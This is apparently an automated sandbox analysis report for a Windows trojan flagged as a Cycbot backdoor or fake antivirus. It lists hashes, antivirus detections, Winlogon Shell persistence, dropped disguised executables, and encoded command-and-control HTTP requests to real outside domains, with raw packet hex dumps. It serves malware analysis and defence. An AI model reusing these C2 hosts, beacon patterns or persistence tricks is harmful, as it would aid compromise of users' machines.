Analysis Date2014-10-15 17:18:25
MD59a8d271edd57c75f8cdc6670311ec2ed
SHA12848a0cf2bdc127ca90a100b5544b2e8233b127e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: dfed7248195884014e7653b52db0fbfb sha1: b9f1b20132dd06b1b45fab490aba7aa96e53c6d4 size: 179712
Section.rdata md5: 77c4541233f61576007e8648ee65d35d sha1: 5a636b12a5ea6648a0ac45e57ef3085261a672f6 size: 3072
Section.data md5: 5976dbe7d8aab3f9f7e042dff4835b52 sha1: 34e2bbc530bc3c424404bf9cf27032895350c366 size: 19456
Section.lib md5: 70517861906ce2a1b374b714693652f7 sha1: 0ad47c7767c8c2372ff152b56a7d7ff3e0b74d70 size: 512
Timestamp2005-10-12 12:38:35
VersionPrivateBuild: 1001
PEhash408ed6014881d404fcfc7989d92354147bfb4fe4
IMPhash67552167529ddea00a699d26fee08718
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Kazy.12298.psa
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-234547
AVDr. WebTrojan.DownLoader2.8045
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KTW
AVFortinetW32/Katusha.O!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Generic_r.FN
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Crypt.AUQU
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Trojan.FakeAV.0997
AVYara APTno_virus
AVZillya!Trojan.Diple.Win32.2721

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNSrossroadbags.com
Winsock DNSzoneak.com
Winsock DNSzoneom.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSrossroadbags.com
Type: A
50.56.218.189
DNSzonetf.com
Type: A
141.8.225.80
DNSzoneom.com
Type: A
50.63.202.40
DNSzoneak.com
Type: A
HTTP GEThttp://rossroadbags.com/images/p_thumb/3520.jpg?tq=gP4aKydy%2BCwoocVgQ8yURcn0y7JTFvihO96ZonV7lF991XC9Ja%2B73ZdFhGdySJTToYvn4IAOuj7B064%2FV89LjI%2FUWAm11fRe6MaSxvbUhDxbus%2FN%2BL2rbQUJYQrC4YkpLADDaDtzFOn1rWgPKvyFnblNxf0ChcUdkdzg8t%2BUkrl2zgiuCP4ARO4GnVKe5VqgNLxTfUWgED0GNxOQuUQEgTXeDZ08IptbOxFCLh%2B9u9bNCxqeWlC5bSK7NU6GWAm2v34XI79VqCjzbJAABrXILyXHNtljqDba3GR4dMbO%2F6ShdhYf5OWX4cIoKN86NZWtvGYPU5gS3Mz9Tg4hE1IPp4lIObH1IrfYffWDzsVIYhLwEvqwrIzYot0OfAP7hh8EP3R8DNCYrgkj322y2xhb7j%2FiGkb0gi3YH5UiLDtp4yF81ciRsVa%2BrDNsLuzIPXY7OLkdV3glH%2B2lGJ40XfkrA1nU1Hff0nlXuVLVnRizftAEymAC90JICgUCOWohZ7oTtAQyK487KnqDBbAln%2FR%2F5tcecEV2E6oXU08cGU0mOT8I6PCEdmC3sDHQo4vG9NuLrYV7jOVa0Z%2B9mrNHmRmXkLeA6b86OcBX5Vl4pOkADi5JNWqWMpEJptoWaVG4%2BOpjIT05f7rAFW1U35fZVWl0DQt7PNVpUMuXe5InO%2BxDAd4Gs734K%2FQA
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zoneom.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQq1ejbwvgS917V65rJqlLfgPiWW1cg
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 50.56.218.189:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 50.63.202.40:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 705f7468   GET /images/p_th
0x00000010 (00016)   756d622f 33353230 2e6a7067 3f74713d   umb/3520.jpg?tq=
0x00000020 (00032)   67503461 4b796479 25324243 776f6f63   gP4aKydy%2BCwooc
0x00000030 (00048)   56675138 79555263 6e307937 4a544676   VgQ8yURcn0y7JTFv
0x00000040 (00064)   69684f39 365a6f6e 56376c46 39393158   ihO96ZonV7lF991X
0x00000050 (00080)   43394a61 25324237 335a6446 68476479   C9Ja%2B73ZdFhGdy
0x00000060 (00096)   534a5454 6f59766e 3449414f 756a3742   SJTToYvn4IAOuj7B
0x00000070 (00112)   30363425 32465638 394c6a49 25324655   064%2FV89LjI%2FU
0x00000080 (00128)   57416d31 31665265 364d6153 78766255   WAm11fRe6MaSxvbU
0x00000090 (00144)   68447862 75732532 464e2532 424c3272   hDxbus%2FN%2BL2r
0x000000a0 (00160)   6251554a 59517243 34596b70 4c414444   bQUJYQrC4YkpLADD
0x000000b0 (00176)   6144747a 464f6e31 72576750 4b767946   aDtzFOn1rWgPKvyF
0x000000c0 (00192)   6e626c4e 78663043 68635564 6b647a67   nblNxf0ChcUdkdzg
0x000000d0 (00208)   38742532 42556b72 6c327a67 69754350   8t%2BUkrl2zgiuCP
0x000000e0 (00224)   3441524f 34476e56 4b653556 71674e4c   4ARO4GnVKe5VqgNL
0x000000f0 (00240)   78546655 57674544 30474e78 4f517555   xTfUWgED0GNxOQuU
0x00000100 (00256)   51456754 5865445a 30384970 74624f78   QEgTXeDZ08IptbOx
0x00000110 (00272)   46434c68 25324239 7539624e 43787165   FCLh%2B9u9bNCxqe
0x00000120 (00288)   576c4335 62534b37 4e553647 57416d32   WlC5bSK7NU6GWAm2
0x00000130 (00304)   76333458 49373956 71436a7a 624a4141   v34XI79VqCjzbJAA
0x00000140 (00320)   42725849 4c795848 4e746c6a 71446261   BrXILyXHNtljqDba
0x00000150 (00336)   33475234 644d624f 25324636 53686468   3GR4dMbO%2F6Shdh
0x00000160 (00352)   5966354f 57583463 496f4b4e 38364e5a   Yf5OWX4cIoKN86NZ
0x00000170 (00368)   57747647 59505535 6753334d 7a395467   WtvGYPU5gS3Mz9Tg
0x00000180 (00384)   34684531 49507034 6c494f62 48314972   4hE1IPp4lIObH1Ir
0x00000190 (00400)   66596666 57447a73 56495968 4c774576   fYffWDzsVIYhLwEv
0x000001a0 (00416)   71777249 7a596f74 304f6641 50376868   qwrIzYot0OfAP7hh
0x000001b0 (00432)   38455033 5238444e 43597267 6b6a3332   8EP3R8DNCYrgkj32
0x000001c0 (00448)   32793278 6862376a 25324669 476b6230   2y2xhb7j%2FiGkb0
0x000001d0 (00464)   67693359 48355569 4c447470 34794638   gi3YH5UiLDtp4yF8
0x000001e0 (00480)   31636952 73566125 32427244 4e734c75   1ciRsVa%2BrDNsLu
0x000001f0 (00496)   7a495058 59374f4c 6b645633 676c4825   zIPXY7OLkdV3glH%
0x00000200 (00512)   3242326c 474a3430 58666b72 41316e55   2B2lGJ40XfkrA1nU
0x00000210 (00528)   31486666 306e6c58 75564c56 6e52697a   1Hff0nlXuVLVnRiz
0x00000220 (00544)   66744145 796d4143 39304a49 43675543   ftAEymAC90JICgUC
0x00000230 (00560)   4f576f68 5a376f54 74415179 4b343837   OWohZ7oTtAQyK487
0x00000240 (00576)   4b6e7144 4262416c 6e253246 52253246   KnqDBbAln%2FR%2F
0x00000250 (00592)   35746365 63455632 45366f58 55303863   5tcecEV2E6oXU08c
0x00000260 (00608)   4755306d 4f543849 36504345 646d4333   GU0mOT8I6PCEdmC3
0x00000270 (00624)   73444851 6f347647 394e754c 72595637   sDHQo4vG9NuLrYV7
0x00000280 (00640)   6a4f5661 305a2532 42396d72 4e486d52   jOVa0Z%2B9mrNHmR
0x00000290 (00656)   6d586b4c 65413662 38364f63 42583556   mXkLeA6b86OcBX5V
0x000002a0 (00672)   6c34704f 6b414469 354a4e57 71574d70   l4pOkADi5JNWqWMp
0x000002b0 (00688)   454a7074 6f576156 47342532 424f706a   EJptoWaVG4%2BOpj
0x000002c0 (00704)   49543035 66377241 46573155 3335665a   IT05f7rAFW1U35fZ
0x000002d0 (00720)   56576c30 44517437 504e5670 554d7558   VWl0DQt7PNVpUMuX
0x000002e0 (00736)   6535496e 4f253242 78444164 34477337   e5InO%2BxDAd4Gs7
0x000002f0 (00752)   33344b25 32465141 20485454 502f312e   34K%2FQA HTTP/1.
0x00000300 (00768)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000310 (00784)   6c6f7365 0d0a486f 73743a20 726f7373   lose..Host: ross
0x00000320 (00800)   726f6164 62616773 2e636f6d 0d0a4163   roadbags.com..Ac
0x00000330 (00816)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000340 (00832)   4167656e 743a206f 70657261 2f382e31   Agent: opera/8.1
0x00000350 (00848)   310d0a0d 0a                           1....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a343620   on: close....46 
0x00000150 (00336)   33393339 33313538 20202069 684f3936   39393158   ihO96
0x00000160 (00352)   5a6f6e56 376c4639 3931580a            ZonV7lF991X.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a38 20202069 684f3936   ose....8   ihO96
0x00000160 (00352)   5a6f6e56 376c4639 3931580a            ZonV7lF991X.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a202069 684f3936   close....  ihO96
0x00000160 (00352)   5a6f6e56 376c4639 3931580a            ZonV7lF991X.

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427651 7131656a 62777667 53393137   fBvQq1ejbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656f6d2e 636f6d0d   ost: zoneom.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206f70 6572612f   er-Agent: opera/
0x000000a0 (00160)   382e3131 0d0a0d0a 304f704c 6a527141   8.11....0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a202069 684f3936   close....  ihO96
0x00000160 (00352)   5a6f6e56 376c4639 3931580a            ZonV7lF991X.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a202069 684f3936   ose......  ihO96
0x00000160 (00352)   5a6f6e56 376c4639 3931580a            ZonV7lF991X.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a73 56495968 4c774576   /html>.sVIYhLwEv
0x000001a0 (00416)   71777249 7a596f74 304f6641 50376868   qwrIzYot0OfAP7hh
0x000001b0 (00432)   38455033 5238444e 43597267 6b6a3332   8EP3R8DNCYrgkj32
0x000001c0 (00448)   32793278 6862376a 25324669 476b6230   2y2xhb7j%2FiGkb0
0x000001d0 (00464)   67693359 48355569 4c447470 34794638   gi3YH5UiLDtp4yF8
0x000001e0 (00480)   31636952 73566125 32427244 4e734c75   1ciRsVa%2BrDNsLu
0x000001f0 (00496)   7a495058 59374f4c 6b645633 676c4825   zIPXY7OLkdV3glH%
0x00000200 (00512)   3242326c 474a3430 58666b72 41316e55   2B2lGJ40XfkrA1nU
0x00000210 (00528)   31486666 306e6c58 75564c56 6e52697a   1Hff0nlXuVLVnRiz
0x00000220 (00544)   66744145 796d4143 39304a49 43675543   ftAEymAC90JICgUC
0x00000230 (00560)   4f576f68 5a376f54 74415179 4b343837   OWohZ7oTtAQyK487
0x00000240 (00576)   4b6e7144 4262416c 6e253246 52253246   KnqDBbAln%2FR%2F
0x00000250 (00592)   35746365 63455632 45366f58 55303863   5tcecEV2E6oXU08c
0x00000260 (00608)   4755306d 4f543849 36504345 646d4333   GU0mOT8I6PCEdmC3
0x00000270 (00624)   73444851 6f347647 394e754c 72595637   sDHQo4vG9NuLrYV7
0x00000280 (00640)   6a4f5661 305a2532 42396d72 4e486d52   jOVa0Z%2B9mrNHmR
0x00000290 (00656)   6d586b4c 65413662 38364f63 42583556   mXkLeA6b86OcBX5V
0x000002a0 (00672)   6c34704f 6b414469 354a4e57 71574d70   l4pOkADi5JNWqWMp
0x000002b0 (00688)   454a7074 6f576156 47342532 424f706a   EJptoWaVG4%2BOpj
0x000002c0 (00704)   49543035 66377241 46573155 3335665a   IT05f7rAFW1U35fZ
0x000002d0 (00720)   56576c30 44517437 504e5670 554d7558   VWl0DQt7PNVpUMuX
0x000002e0 (00736)   6535496e 4f253242 78444164 34477337   e5InO%2BxDAd4Gs7
0x000002f0 (00752)   33344b25 32465141 20485454 502f312e   34K%2FQA HTTP/1.
0x00000300 (00768)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000310 (00784)   6c6f7365 0d0a486f 73743a20 726f7373   lose..Host: ross
0x00000320 (00800)   726f6164 62616773 2e636f6d 0d0a4163   roadbags.com..Ac
0x00000330 (00816)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000340 (00832)   4167656e 743a206f 70657261 2f382e31   Agent: opera/8.1
0x00000350 (00848)   310d0a0d 0a                           1....


Strings
U
#
040904b0
1001
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
19WLnQaA
2;o% lf
3@h*2j
4zy|~^
5\T;k0
